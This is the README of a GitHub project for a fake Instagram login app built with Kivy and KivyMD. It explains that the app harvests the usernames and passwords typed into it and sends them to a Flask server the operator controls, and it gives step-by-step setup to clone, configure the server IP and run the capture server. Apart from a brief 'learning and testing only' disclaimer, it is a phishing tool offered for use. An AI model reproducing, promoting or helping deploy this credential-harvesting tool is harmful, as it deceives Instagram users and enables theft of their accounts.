This simple application written by Kivy framework of Python language and KivyMD for logging into instagram. This is a fake instagram login app.
- Allows users to enter their username and password.
- Send credentials to your own server (flask, fastapi or which you want) which you create as if you want.
- Validates the input and displays an error message and etc.
- Clone the repository.
git clone https://github.com/alasgarovs/instagram-fake-apk.git
- Install the required dependencies.
pip install -r requirements.txt
- Configure the IP address of the server in server.py and run it so the server will listen to capture your username and password from your application.
python server.py
- Set
flask_server_ip_last_octet
in main.py to be the same as the last octet of the server IP and run main.py.
python main.py
This program is made for learning and testing purposes only. The developer is not responsible for any situations that may occur while using this application.
Contributions are welcome! If you have any suggestions, bug reports, or feature requests, please open an issue or submit a pull request.